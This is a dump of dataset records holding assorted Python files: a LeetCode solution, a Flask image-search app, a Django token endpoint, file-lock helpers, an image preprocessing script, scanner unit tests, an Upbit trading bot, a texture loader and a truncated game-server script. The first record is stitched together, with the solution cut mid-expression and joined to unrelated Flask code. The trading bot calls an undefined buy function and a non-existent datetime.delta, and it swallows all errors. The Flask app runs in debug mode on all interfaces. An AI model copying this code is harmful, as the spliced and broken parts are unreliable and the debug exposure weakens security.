+{"seq_id":"452846451","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 2018/12/13 14:54\n@author: Sucre\n@email: qian.dong.2018@gmail.com\n\"\"\"\n\n\nclass Solution:\n def maxArea(self, height):\n \"\"\"\n :type height: List[int]\n :rtype: int\n \"\"\"\n r = len(height) - 1\n l = 0\n max_area = 0\n while l < r:\n width = r - l\n h = min(height[r], height[l])\n max_area = max(max_area, width*h)\n if height[l]/')\ndef uploaded_file(filename,filename2):\n\n model=load_model()\n img_f=Image.open(\"uploads/\"+filename)\n img_f=resize_aspect_ratio(img_f,(200,200))\n img_f=padding(img_f,(224,224))\n img_f_in=preprocess_input(np.expand_dims(np.array(img_f),axis=0)) \n query_feature_front = model.predict(img_f_in)[0] \n sim_front=query_feature_front.dot(feature_f.T)\n \n img_b=Image.open(\"uploads/\"+filename2)\n img_b=resize_aspect_ratio(img_b,(200,200))\n img_b=padding(img_b,(224,224))\n img_b_in=preprocess_input(np.expand_dims(np.array(img_b),axis=0))\n query_feature_back=model.predict(img_b_in)[0]\n sim_back=query_feature_back.dot(feature_b.T)\n top20=np.argsort(sim_front+sim_back)[-20:][::-1]\n \n fig=searching_display(top20,[img_f,img_b],[filename,filename2])\n fig.savefig('output/{}.jpg'.format(filename)) \n return send_file(\"output/{}.jpg\".format(filename), mimetype='image/jpg')\n\nif __name__ == '__main__':\n db_list , feature_f , feature_b =load_data_directory()\n #model=load_model()\n app.debug=True\n app.run(host=\"0.0.0.0\",port=int(\"8080\"))\n\n","sub_path":"image_similarity/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"370943959","text":"from rest_framework import serializers\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom drf_yasg.utils import swagger_auto_schema\nfrom drf_yasg import openapi\nimport uuid\nfrom management.mixins import MixinViewSet\nfrom management.utils.csrf import CsrfExemptSessionAuthentication\n\n\nclass TokenSerializer(serializers.Serializer):\n aaa = serializers.CharField(max_length=40, required=True, allow_null=False,\n label='aaa *')\n bbb = serializers.CharField(max_length=40, required=True, allow_null=False,\n label='bbb *')\n\n class Meta:\n fields = '__all__'\n\n\nclass TokenView(MixinViewSet):\n serializer_class = TokenSerializer\n http_method_names = ['post']\n authentication_classes = (CsrfExemptSessionAuthentication,)\n\n @swagger_auto_schema(\n operation_description='Token API',\n tags=['Example Token'],\n request_body=openapi.Schema(\n type=openapi.TYPE_OBJECT,\n required=['aaa', 'bbb'],\n properties={\n 'aaa': openapi.Schema(type=openapi.TYPE_STRING),\n 'bbb': openapi.Schema(type=openapi.TYPE_STRING),\n },\n ),\n responses={\n status.HTTP_200_OK: openapi.Response(\n '{\"token\": \"xxxx\", success\": True}'),\n status.HTTP_500_INTERNAL_SERVER_ERROR: openapi.Response('{\"success\": False, \"message\": \"\"}'),\n },\n )\n def post(self, request, format=None):\n serializer = self.serializer_class(data=request.data)\n reply = {\n 'success': False,\n 'message': \"unknown error\"\n }\n if serializer.is_valid():\n reply = {\"token\": str(uuid.uuid4()), \"success\": True}\n return Response(reply, status=status.HTTP_200_OK)\n if serializer.errors:\n reply['message'] = serializer.errors\n return Response(reply, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n","sub_path":"projectname/exampleapp/apis/v1/token.py","file_name":"token.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"411555616","text":"# Copyright (c) Meta Platforms, Inc. and affiliates.\n#\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\n\nimport fcntl\nimport logging\nimport os\nfrom contextlib import contextmanager\nfrom pathlib import Path\nfrom typing import Generator, Optional\n\n\nLOG: logging.Logger = logging.getLogger(__name__)\n\n\nclass EnvironmentException(Exception):\n pass\n\n\ndef readable_directory(directory: str) -> str:\n if not os.path.isdir(directory):\n raise EnvironmentException(f\"`{directory}` is not a valid directory.\")\n if not os.access(directory, os.R_OK):\n raise EnvironmentException(f\"`{directory}` is not a readable directory.\")\n return directory\n\n\ndef writable_directory(path: str) -> str:\n # Create the directory if it does not exist.\n try:\n os.makedirs(path)\n except FileExistsError:\n pass\n path = os.path.abspath(path)\n if not os.path.isdir(path):\n raise EnvironmentException(f\"{path} is not a valid directory.\")\n if not os.access(path, os.W_OK):\n raise EnvironmentException(f\"{path} is not a writable directory.\")\n return path\n\n\ndef expand_relative_path(root: str, path: str) -> str:\n expanded_path = Path(path).expanduser()\n if expanded_path.is_absolute():\n return str(expanded_path)\n else:\n return str(Path(root) / expanded_path)\n\n\ndef expand_global_root(path: str, global_root: str) -> str:\n if path.startswith(\"//\"):\n return expand_relative_path(global_root, path[2:])\n return path\n\n\ndef file_or_directory_exists(path: str) -> str:\n if os.path.isdir(path) or os.path.isfile(path):\n return path\n raise ValueError(f\"{path} is not a valid path\")\n\n\ndef _lock_command(blocking: bool, is_shared_reader: bool) -> int:\n lock_command = fcntl.LOCK_SH if is_shared_reader else fcntl.LOCK_EX\n return lock_command if blocking else lock_command | fcntl.LOCK_NB\n\n\n@contextmanager\ndef acquire_lock(\n path: str, blocking: bool, is_shared_reader: bool = False\n) -> Generator[Optional[int], None, None]:\n \"\"\"Raise an OSError if `blocking` is False and the lock can't be acquired.\n\n If `is_shared_reader=True`, then other processes can acquire the same\n lock with `is_shared_reader=True`, but not with `is_shared_reader=False`.\n Conversely, if `is_shared_reader=False`, then no other process can\n acquire the lock until it is released.\"\"\"\n\n LOG.debug(\n \"Trying to acquire %slock on file %s\",\n \"shared reader \" if is_shared_reader else \"\",\n path,\n )\n try:\n with open(path, \"w+\") as lockfile:\n try:\n fcntl.lockf(\n lockfile.fileno(), _lock_command(blocking, is_shared_reader)\n )\n yield lockfile.fileno()\n finally:\n fcntl.lockf(lockfile.fileno(), fcntl.LOCK_UN)\n except FileNotFoundError:\n LOG.debug(f\"Unable to acquire lock because lock file {path} was not found\")\n yield\n","sub_path":"client/filesystem.py","file_name":"filesystem.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"76583786","text":"import sys\nsys.path.append('/home/david/fashionAI/Gluon-FashionAI-Attributes/data/cocoapi/PythonAPI')\nfrom pycocotools.coco import COCO\nimport json\nimport csv\nimport cv2\nimport imutils\nfrom pathlib import Path\nimport pickle\nimport numpy as np\n\nBASE_SHAPE = 360\n\nrgb_mean = np.array([0.485, 0.456, 0.406])\nrgb_std = np.array([0.229, 0.224, 0.225])\n\nlabel_dict = {'coat_length_labels': [],\n 'lapel_design_labels': [],\n 'neckline_design_labels': [],\n 'skirt_length_labels': [],\n 'collar_design_labels': [],\n 'neck_design_labels': [],\n 'pant_length_labels': [],\n 'sleeve_length_labels': []}\n\ntransfered_label_dict = {'coat_length_labels': [],\n 'lapel_design_labels': [],\n 'neckline_design_labels': [],\n 'skirt_length_labels': [],\n 'collar_design_labels': [],\n 'neck_design_labels': [],\n 'pant_length_labels': [],\n 'sleeve_length_labels': []}\n\n# Train\n# dataset_json_file = '/data/david/fai_attr/gloun_data/detection_labels/train_val.json'\n# # results_json_file = '/data/david/fai_attr/gloun_data/detection_labels/train_val_results-v1.json'\n# results_json_file = '/data/david/fai_attr/gloun_data/detection_labels/train_val_results-v2.json'\n# dataset_path = '/data/david/fai_attr/raw_data/train_v1'\n# label_file_path = dataset_path + '/Annotations/train.csv'\n# outout_path = '/data/david/fai_attr/transfered_data/train_v4'\n\n# dataset_json_file = '/data/david/fai_attr/gloun_data/detection_labels/validation_v1.json'\n# results_json_file = '/data/david/fai_attr/gloun_data/detection_labels/validation_v1_detection_max_5.json'\n# dataset_path = '/data/david/fai_attr/raw_data/val_v1'\n# label_file_path = dataset_path + '/Annotations/val.csv'\n# outout_path = '/data/david/fai_attr/transfered_data/val_v2'\n\ndataset_json_file = '/data/david/fai_attr/gloun_data/detection_labels/test_v1.json'\nresults_json_file = '/data/david/fai_attr/gloun_data/detection_labels/test_v1_detection_max_5.json'\ndataset_path = '/data/david/fai_attr/raw_data/partial_test_for_val_v2'\nlabel_file_path = dataset_path + '/Annotations/test.csv'\noutout_path = '/data/david/fai_attr/transfered_data/partial_test_v2'\n\nfor file_path in [dataset_json_file, results_json_file, label_file_path]:\n assert Path(file_path).exists(), \"%s not exist\" % file_path\n\ndef find_label_by_path(task, img_path):\n for line in label_dict[task]:\n if img_path == line[0]:\n return line[1]\n return None\n\ndef convert_label_to_one_hot(raw_label):\n label_y = [int(l == 'y')*1 for l in raw_label]\n label_m = [int(l == 'm')*0.5 for l in raw_label]\n label = [x+y for x,y in zip(label_m, label_y)]\n return label\n\ndef normalize_image(data):\n return (data.astype('float32') / 255 - rgb_mean) / rgb_std\n\ncoco=COCO(dataset_json_file)\ndetections = json.load(Path(results_json_file).open())\n# [x['name'] for x in coco.cats.values()]\ncat_list = ['blouse', 'dress', 'outwear', 'skirt', 'trousers']\ntask_list = ['coat_length_labels', 'lapel_design_labels', 'neckline_design_labels', 'skirt_length_labels', 'collar_design_labels', 'neck_design_labels', 'pant_length_labels', 'sleeve_length_labels']\nno_dets_nums = 0\nmatch_nums = 0\n\nlabel_file_op = Path(label_file_path).open('r')\nlines = label_file_op.readlines()\ntokens = [l.rstrip().split(',') for l in lines]\nfor path, task, label in tokens:\n label_dict[task].append((path, label))\n\nfor img_id in coco.imgs:\n\n img_info = coco.imgs[img_id]\n task = img_info['file_name'].split('/')[1]\n img_path = Path(dataset_path, img_info['file_name'])\n\n # if not 
img_path.exists():\n    #     continue\n\n    assert img_path.exists(), \"img_path %s does not exist\" % img_path\n    img_raw = cv2.imread(img_path.as_posix())\n    raw_label = find_label_by_path(task, img_info['file_name'])\n\n    # if raw_label is None:\n    #     continue\n\n    one_hot_label = convert_label_to_one_hot(raw_label)\n\n    dets = [det for det in detections if det['image_id'] == img_id]\n    if len(dets) == 0:\n        img_raw_resize = cv2.resize(img_raw, (BASE_SHAPE, BASE_SHAPE))\n        cv2.imwrite(Path(outout_path, img_info['file_name']).as_posix(), img_raw_resize)\n        transfered_label_dict[task].append((img_info['file_name'], task, raw_label, one_hot_label, [0, 0, 0, 0], \"UNKNOWN\"))\n        no_dets_nums = no_dets_nums+1\n        print(\"no dets for %s \" % img_info['file_name'])\n        continue\n\n    # TODO: choose best det here\n    # task_list = ['coat_length_labels', 'lapel_design_labels', 'neckline_design_labels', 'skirt_length_labels', 'collar_design_labels', 'neck_design_labels', 'pant_length_labels', 'sleeve_length_labels']\n    det_names = [coco.cats[det['category_id']]['name'] for det in dets]\n    curent_det = None  # reset per image; otherwise a stale detection from the previous image is reused (or NameError on the first image)\n    if task in ['sleeve_length_labels', 'coat_length_labels', 'lapel_design_labels', 'neckline_design_labels', 'collar_design_labels', 'neck_design_labels']:\n        for cat_name in [\"outwear\", 'blouse', 'dress']:\n            if cat_name in det_names:\n                curent_det = dets[det_names.index(cat_name)]\n    elif task in ['skirt_length_labels', 'pant_length_labels']:\n        for cat_name in [\"skirt\", 'trousers', 'dress']:\n            if cat_name in det_names:\n                curent_det = dets[det_names.index(cat_name)]\n\n    if curent_det is None:\n        det = dets[0]\n        print('category %s not match task: %s' % (coco.cats[det['category_id']]['name'], task))\n    else:\n        det = curent_det\n        match_nums = match_nums + 1\n\n    category_id = det['category_id']\n    category_name = coco.cats[det['category_id']]['name']\n    bbox = [int(i) for i in det['bbox']]\n\n    cropped_img = img_raw[bbox[1]:bbox[1]+bbox[3], bbox[0]:bbox[0]+bbox[2]]\n    c_h, c_w = cropped_img.shape[:2]\n    max_dim = max(c_h, c_w)\n    top_pad = (max_dim - c_h) // 2\n    bottom_pad = max_dim - c_h - top_pad\n    left_pad = (max_dim - c_w) // 2\n    right_pad = max_dim - c_w - left_pad\n    padding = [(top_pad, bottom_pad), (left_pad, right_pad), (0, 0)]\n    cropped_img = np.pad(cropped_img, padding, mode='constant', constant_values=0)\n    resize_img = cv2.resize(cropped_img, (BASE_SHAPE, BASE_SHAPE), interpolation=cv2.INTER_CUBIC)\n\n    # cat_list = ['blouse', 'dress', 'outwear', 'skirt', 'trousers']\n    # task_list = ['coat_length_labels', 'lapel_design_labels', 'neckline_design_labels', 'skirt_length_labels', 'collar_design_labels', 'neck_design_labels', 'pant_length_labels', 'sleeve_length_labels',]\n    # if (category_name in [\"skirt\", 'trousers'] and task in ['pant_length_labels', 'skirt_length_labels']) or \\\n    #     (category_name in [\"outwear\", 'blouse'] and task in ['sleeve_length_labels', 'coat_length_labels', 'lapel_design_labels', 'neckline_design_labels', 'collar_design_labels', 'neck_design_labels']) or \\\n    #     (category_name == 'dress' and task in ['pant_length_labels', 'skirt_length_labels', 'sleeve_length_labels', 'coat_length_labels']):\n    #     print('category %s matches task: %s' % (category_name, task))\n    #     match_nums = match_nums + 1\n    # for det in dets:\n    #     category_id = det['category_id']\n    #     category_name = coco.cats[det['category_id']]['name']\n    #     if (category_name in [\"skirt\", 'trousers'] and task in ['pant_length_labels', 'skirt_length_labels']) or \\\n    #         (category_name in [\"outwear\", 'blouse'] and task in ['sleeve_length_labels', 'coat_length_labels', 
'lapel_design_labels', 'neckline_design_labels', 'collar_design_labels', 'neck_design_labels']) or \\\n # (category_name == 'dress' and task in ['skirt_length_labels', 'sleeve_length_labels', 'coat_length_labels']):\n # print('category %s matches task: %s' % (category_name, task))\n # match_nums = match_nums + 1\n # curent_det = det\n # break\n # height, width = img_raw.shape[:2]\n # if height > width:\n # img_raw = imutils.rotate_bound(img_raw, 270)\n # height, width = img_raw.shape[:2]\n # bbox = [bbox[1], width-bbox[0]-bbox[2], bbox[3], bbox[2]]\n # # print(\"get raw image %s at (%d, %d) \" % (img_path, img_raw.shape[0], img_raw.shape[1]))\n # center_x, center_y = bbox[0] + bbox[2]/2, bbox[1] + bbox[3]/2\n # if center_x <= height/2:\n # margin_x_right = height\n # cropped_img = img_raw[:, :margin_x_right]\n # elif center_x > height/2 and width - center_x < height/2:\n # margin_x_left = width - height\n # bbox[0] = bbox[0] - margin_x_left\n # cropped_img = img_raw[:, margin_x_left:]\n # elif center_x >= height/2 and width - center_x >= height/2:\n # margin_x_left = int(center_x - height/2)\n # bbox[0] = bbox[0] - margin_x_left\n # cropped_img = img_raw[:, margin_x_left:margin_x_left+height]\n # else:\n # raise RuntimeError()\n # # TODO: refix crop image depending on bbox\n # bbox[0] = 0 if bbox[0] < 0 else bbox[0]\n # assert cropped_img.shape[0] == cropped_img.shape[1], \"cropped_img should resized to same shape (%d, %d)\" % (cropped_img.shape[0], cropped_img.shape[1])\n # resize_img = cv2.resize(cropped_img, (BASE_SHAPE, BASE_SHAPE), interpolation=cv2.INTER_CUBIC)\n\n # post processing\n output_imgs_path = Path(outout_path, 'Images', task)\n if not output_imgs_path.exists():\n output_imgs_path.mkdir(parents=True)\n\n # 1. save image\n output_resized_img_path = Path(output_imgs_path, img_path.name)\n output_label_pkl_path = Path(output_imgs_path, img_path.stem+'.pkl')\n cv2.imwrite(output_resized_img_path.as_posix(), resize_img)\n # print(\"save image to %s as shape (%d, %d)\" % (output_resized_img_path, resize_img.shape[0], resize_img.shape[1]))\n # 2. save new labels\n transfered_label_dict[task].append((img_info['file_name'], task, raw_label, one_hot_label, bbox, category_name))\n # 3. 
TODO: save new labels to pkl\n    # total_results = {\"image\": resize_img.astype(float), \"raw_label\": raw_label, \"one_hot_label\": one_hot_label}\n    # pickle.dump(total_results, output_label_pkl_path.open(\"w\"))\n\nprint(\"total matched %d/%d\" % (match_nums, len(coco.imgs)))\nprint(\"no dets matched %d/%d\" % (no_dets_nums, len(coco.imgs)))\n\nfor task in transfered_label_dict.keys():\n    csv_file_path = Path(outout_path, 'Annotations', \"%s.csv\" % task)\n    if not csv_file_path.parent.exists():\n        csv_file_path.parent.mkdir(parents=True)\n\n    csv_file = csv_file_path.open('w+')\n    spamwriter = csv.writer(csv_file)\n\n    for line in transfered_label_dict[task]:\n        file_name, task, raw_label, one_hot_label, bbox, category_name = line\n        output_label_list = '_'.join([str(x) for x in one_hot_label])\n        output_bbox_list = '_'.join([str(x) for x in bbox])\n        spamwriter.writerow([file_name, task, raw_label, output_label_list, output_bbox_list, category_name])\n\n    csv_file.close()\n    print(\"finished writing %s \" % csv_file_path)\n\n\n# coco.imgs:\n# 4073319441911775229: {'id': 4073319441911775229, 'height': 512, 'width': 512, 'file_name': 'Images/skirt_length_labels/14cff0d4c1566b53937556a56a396cb0.jpg'}\n# detection\n# det = detections[0]\n# {'bbox': [141.21919476310723, 148.1283797967682, 268.367932953227, 336.9712621340266], 'score': 0.16471093893051147, 'image_id': 7322388807026071477, 'category_id': 1}\n# (Pdb) len(coco.imgs)\n# 89683\n# [('blouse', 19387), ('dress', 31065), ('outwear', 18212), ('skirt', 13191), ('trousers', 7822)]\n\n","sub_path":"scripts/preprocess_img_v2.py","file_name":"preprocess_img_v2.py","file_ext":"py","file_size_in_byte":11383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"264104183","text":"import unittest\n\nfrom unimport.constants import PY38_PLUS\nfrom unimport.scan import ImportableVisitor\nfrom unimport.session import Session\nfrom unimport.statement import Import, ImportFrom, Name\n\n\nclass ScannerTestCase(unittest.TestCase):\n maxDiff = None\n include_star_import = False\n\n def setUp(self):\n self.scanner = Session(\n include_star_import=self.include_star_import\n ).scanner\n\n def assertUnimportEqual(\n self,\n source,\n expected_names=[],\n expected_imports=[],\n ):\n self.scanner.scan(source)\n self.assertEqual(expected_names, self.scanner.names)\n self.assertEqual(expected_imports, self.scanner.imports)\n self.scanner.clear()\n\n\nclass TestNames(ScannerTestCase):\n def test_names(self):\n source = (\n \"variable = 1\\n\"\n \"variable1 = 2\\n\"\n \"class TestClass:\\n\"\n \"\\tpass\\n\"\n \"def function():\\n\"\n \"\\tpass\"\n )\n self.assertUnimportEqual(\n source,\n expected_names=[\n Name(lineno=1, name=\"variable\"),\n Name(lineno=2, name=\"variable1\"),\n ],\n )\n\n def test_names_with_import(self):\n source = (\n \"variable = 1\\n\"\n \"import os\\n\"\n \"class TestClass():\\n\"\n \"\\tdef test_function(self):\\n\"\n \"\\t\\tpass\\n\"\n \"def test_function():\\n\"\n \"\\tpass\"\n )\n self.assertUnimportEqual(\n source,\n expected_names=[Name(lineno=1, name=\"variable\")],\n expected_imports=[Import(lineno=2, column=1, name=\"os\")],\n )\n\n def test_names_with_function(self):\n self.assertUnimportEqual(\n source=\"variable = 1\\n\" \"def test():\\n\" \"\\tpass\",\n expected_names=[Name(lineno=1, name=\"variable\")],\n )\n\n def test_names_with_class(self):\n source = (\n \"variable = 1\\n\"\n \"def test_function():\\n\"\n \"\\tpass\\n\"\n \"class test():\\n\"\n \"\\tdef test_function():\\n\"\n \"\\t\\tpass\"\n )\n self.assertUnimportEqual(\n source,\n expected_names=[Name(lineno=1, name=\"variable\")],\n )\n\n def test_decator_in_class(self):\n source = (\n \"class Test:\\n\"\n \" def test(self):\\n\"\n \" def test2():\\n\"\n \" return 'test2'\\n\"\n \" return test2\\n\"\n )\n\n self.assertUnimportEqual(\n source,\n expected_names=[Name(lineno=5, name=\"test2\")],\n )\n\n\nclass SkipImportTest(ScannerTestCase):\n def assertSkipEqual(self, source):\n super().assertUnimportEqual(\n source,\n )\n\n def test_inside_try_except(self):\n source = (\n \"try:\\n\"\n \" import django # unimport:skip\\n\"\n \"except ImportError:\\n\"\n \" print('install django')\\n\"\n )\n self.assertSkipEqual(source)\n\n def test_as_import(self):\n source = \"from x import y as z # unimport:skip\\n\"\n self.assertSkipEqual(source)\n\n def test_ongoing_comment(self):\n source = \"import unimport # unimport:skip import test\\n\"\n self.assertSkipEqual(source)\n\n def test_skip_comment_second_option(self):\n source = \"import x # unimport:skip test\\n\"\n self.assertSkipEqual(source)\n\n def test_noqa_skip_comment(self):\n source = \"from x import (t, y, f, r) # noqa\\n\"\n self.assertSkipEqual(source)\n\n def test_noqa_skip_comment_multiple(self):\n source = \"from x import ( # noqa\\n\" \" t, y,\\n\" \" f, r\\n\" \")\\n\"\n self.assertSkipEqual(source)\n\n def test_skip_file(self):\n source = \"# unimport:skip_file\\n\" \"import x\\n\"\n self.assertSkipEqual(source)\n\n def test_skip_file_after_import(self):\n source = \"import x\\n\" \"# unimport:skip_file\\n\"\n self.assertSkipEqual(source)\n\n\n@unittest.skipIf(\n not PY38_PLUS, \"This feature is only available for python 3.8.\"\n)\nclass TestTypeComments(ScannerTestCase):\n def 
test_type_comments(self):\n source = (\n \"from typing import Any\\n\"\n \"from typing import Tuple\\n\"\n \"from typing import Union\\n\"\n \"def function(a, b):\\n\"\n \" # type: (Any, str) -> Union[Tuple[None, None], Tuple[str, str]]\\n\"\n \" pass\\n\"\n )\n expected_names = [\n Name(lineno=1, name=\"Any\"),\n Name(lineno=1, name=\"Union\"),\n Name(lineno=1, name=\"Tuple\"),\n Name(lineno=1, name=\"Tuple\"),\n ]\n expected_imports = [\n ImportFrom(\n lineno=1, column=1, name=\"Any\", star=False, suggestions=[]\n ),\n ImportFrom(\n lineno=2,\n column=1,\n name=\"Tuple\",\n star=False,\n suggestions=[],\n ),\n ImportFrom(\n lineno=3, column=1, name=\"Union\", star=False, suggestions=[]\n ),\n ]\n self.assertUnimportEqual(\n source,\n expected_names,\n expected_imports,\n )\n\n\nclass TestImportable(unittest.TestCase):\n maxDiff = None\n\n def setUp(self):\n self.importable = ImportableVisitor()\n\n def test_get_names_from_all(self):\n source = (\n \"__all__ = ['test']\\n\"\n \"__all__.append('test2')\\n\"\n \"__all__.extend(['test3'])\\n\"\n \"\\n\"\n )\n expected = frozenset({\"test3\", \"test\", \"test2\"})\n self.importable.traverse(source)\n self.assertEqual(expected, self.importable.get_all())\n\n def test_get_names_from_suggestion(self):\n source = (\n \"import xx\\n\"\n \"class A:\\n\"\n \" pass\\n\"\n \"def b():\\n\"\n \" FUNCNAME = 'test'\\n\"\n \"NAME='NAME'\\n\"\n \"\\n\"\n )\n expected = frozenset({\"xx\", \"NAME\", \"b\", \"A\"})\n self.importable.traverse(source)\n self.assertEqual(expected, self.importable.get_suggestion())\n","sub_path":"tests/test_scanner.py","file_name":"test_scanner.py","file_ext":"py","file_size_in_byte":6135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"467445888","text":"import pyupbit\nimport time\nimport datetime\n\n\nwith open(\"upbit.txt\") as f:\n lines = f.readlines()\n key = lines[0].strip()\n secret = lines[1].strip()\n upbit = pyupbit.Upbit(key, secret)\n\n'''\n내 잔고 조회\n'''\nupbit = pyupbit.Upbit(key, secret)\nprint(upbit.get_balances())\n\n'''\n변동성 돌파 목표가 계산을 위한 함수\n'''\ndef get_target_price(ticker):#재사용을 위해 함수 선언\n df = pyupbit.get_ohlcv(ticker)\n yesterday = df.iloc[-2]#끝에서 2번째인 전일 데이터를 가지고 온다.\n today_open = yesterday['close']#당일 시가를 얻어온다.\n yesterday_high = yesterday['high']#전일 고가를 얻어온다.\n yesterday_low = yesterday['low']#전일 저가를 얻어온다.\n target = today_open + (yesterday_high - yesterday_low)#변동성 돌파 목표가 계산\n return target\n\n\n'''\n매도 함수\n'''\ndef sell_crypto_currency(ticker):\n unit = upbit.get_balances()\n upbit.sell_market_order(ticker, unit)#해당 코인을 시장가로 매매\n\n'''\n매일 정각이 되면 목표가를 계산하여 갱신\n'''\nwhile True:\n try:\n now = datetime.datetime.now()#현재 시간 조회\n mid = datetime.datetime(now.year, now.month, now.day, 9) # 오전 9시를 고정으로 잡는다.\n if mid < now < mid + datetime.delta(seconds=10):#00시를 초단위로 정확하게 알지 못하기 떄문에 10초의 범위안에서 실행하게 한다.\n sell_crypto_currency(\"KRW-BTC\")#모든 코인을 매도\n target_price = get_target_price(\"KRW-BTC\")#목표가 계산\n\n\n current_price = pyupbit.get_current_price(\"KRW-BTC\")#현재가 조회\n if current_price > target_price:#현재가가 목표가보다 높은지 검사\n buy_crypto_currency(\"KRW-BTC\")#매수\n except:\n print(\"에러 발생\")\n time.sleep(1)\n\n","sub_path":"upbitauto.py","file_name":"upbitauto.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"327879468","text":"import logging\r\nfrom typing import Any, Tuple\r\n\r\ntry:\r\n from PIL import Image\r\nexcept ImportError as ex:\r\n raise ImportError(\"Texture loader 'PillowLoader' requires Pillow: {}\".format(ex))\r\n\r\nfrom moderngl_window.loaders.base import BaseLoader\r\nfrom moderngl_window.exceptions import ImproperlyConfigured\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\n\r\nclass PillowLoader(BaseLoader):\r\n \"\"\"Base loader using PIL/Pillow\"\"\"\r\n kind = '__unknown__'\r\n\r\n def __init__(self, meta):\r\n super().__init__(meta)\r\n self.image = None\r\n\r\n def load(self) -> Any:\r\n raise NotImplementedError()\r\n\r\n def _open_image(self):\r\n if self.meta.image:\r\n self.image = self.meta.image\r\n else:\r\n self.meta.resolved_path = self.find_texture(self.meta.path)\r\n logger.info(\"loading %s\", self.meta.resolved_path)\r\n if not self.meta.resolved_path:\r\n raise ImproperlyConfigured(\"Cannot find texture: {}\".format(self.meta.path))\r\n\r\n self.image = Image.open(self.meta.resolved_path)\r\n\r\n if self.meta.flip:\r\n self.image = self.image.transpose(Image.FLIP_TOP_BOTTOM)\r\n\r\n def _close_image(self):\r\n self.image.close()\r\n\r\n\r\ndef image_data(image: Image) -> Tuple[int, bytes]:\r\n \"\"\"Get components and bytes for an image.\r\n The number of components is assumed by image\r\n size and the byte length of the raw data.\r\n\r\n Returns:\r\n Tuple[int, bytes]: Number of components, byte data\r\n \"\"\"\r\n # NOTE: We might want to check the actual image.mode\r\n # and convert to an acceptable format.\r\n # At the moment we load the data as is.\r\n data = image.tobytes()\r\n components = len(data) // (image.size[0] * image.size[1])\r\n logger.debug(\"image_data size=[%s, %s] components=%s bytes=%s\", image.size[0], image.size[1], components, len(data))\r\n return components, data\r\n","sub_path":"moderngl_window/loaders/texture/pillow.py","file_name":"pillow.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"192759993","text":"from outpost_server.core import use, util\nfrom outpost_server.core.data import DATA\nfrom outpost_server.outpost.lib import autorotate, door, mallet, structure_items, tool, ward\n\nautorotate.register_floor('road')\nmallet.register('road/', mallet.TERRAIN_VARIANTS)\n\nautorotate.register_floor('house_floor', 'wood_floor')\nmallet.register('wood_floor/', mallet.TERRAIN_VARIANTS)\n\nfor color in ('red', 'orange', 'yellow', 'green', 'blue', 'purple'):\n autorotate.register_floor('wood_floor/' + color)\n mallet.register('wood_floor/%s/' % color, mallet.TERRAIN_VARIANTS)\n\n\n\n\nautorotate.register_fence('fence', 'fence_post')\nmallet.register('fence/', mallet.WALL_VARIANTS)\nmallet.register('fence/', ('end/fancy/e', 'end/fancy/w'))\nstructure_items.register('fence_gate', 'fence/gate/closed', tool='axe')\ndoor.register_use('fence/gate', tool_name='axe')\n\n\nstructure_items.register('bed')\nstructure_items.register('double/bed')\nstructure_items.register('trophy')\nstructure_items.register('fountain')\nstructure_items.register('stair', 'stair/n')\nstructure_items.register('wood_pillar', 'pillar/wood')\nstructure_items.register('stone_pillar', 'pillar/stone')\nstructure_items.register('statue', 'statue/e')\nmallet.register('statue/', ('e', 's', 'w', 'n'))\n\nstructure_items.register('table')\nstructure_items.register_base('table', 'table')\nstructure_items.register('iron/table')\nstructure_items.register_base('iron/table', 'table')\n\nstructure_items.register('torch')\nfor color in ('red', 'orange', 'yellow', 'green', 'blue', 'purple'):\n structure_items.register('torch/' + color)\n\n\n\nLAMP_ITEM = DATA.item('lamp')\nLAMP = DATA.template('lamp')\nLAMP_OFF = DATA.template('lamp/off')\nLAMP_ATTACHED = DATA.template('lamp/attached')\nLAMP_OFF_ATTACHED = DATA.template('lamp/off/attached')\n\nLAMP_TOGGLE = {\n LAMP: LAMP_OFF,\n LAMP_OFF: LAMP,\n LAMP_ATTACHED: LAMP_OFF_ATTACHED,\n LAMP_OFF_ATTACHED: LAMP_ATTACHED,\n }\n\n@use.structure(LAMP)\n@use.structure(LAMP_OFF)\n@use.structure(LAMP_ATTACHED)\n@use.structure(LAMP_OFF_ATTACHED)\ndef use_lamp(e, s, args):\n ward.check(e, s.pos())\n s.replace(LAMP_TOGGLE[s.template()])\n\n@tool.axe(LAMP)\n@tool.axe(LAMP_OFF)\n@tool.axe(LAMP_ATTACHED)\n@tool.axe(LAMP_OFF_ATTACHED)\ndef axe_lamp(e, s, args):\n structure_items.take(e, s, LAMP_ITEM)\n\n@use.item(LAMP_ITEM)\ndef place_lamp(e, args):\n if structure_items.check_attachment(LAMP_ATTACHED, e.plane(), util.hit_tile(e)):\n structure_items.place(e, LAMP_ITEM, LAMP_ATTACHED)\n else:\n structure_items.place(e, LAMP_ITEM, LAMP)\n\nstructure_items.register_attachment(LAMP_ATTACHED, 'table')\nstructure_items.register_attachment(LAMP_OFF_ATTACHED, 'table')\n\n\n\ndef wall_and_door(name, tool, extra_variants=()):\n horiz_variants = ('edge/horiz',) + extra_variants\n\n autorotate.register_wall('%s_wall' % name)\n mallet.register('%s_wall/' % name,\n horiz_variants + mallet.COMMON_WALL_VARIANTS)\n structure_items.register('%s_door' % name, '%s_wall/door/closed' % name, tool)\n door.register_use('%s_wall/door' % name, tool_name=tool)\n\n for v in horiz_variants:\n structure_items.register_base('%s_wall/%s' % (name, v), 'wall/horiz')\n structure_items.register_base('%s_wall/tee/n' % name, 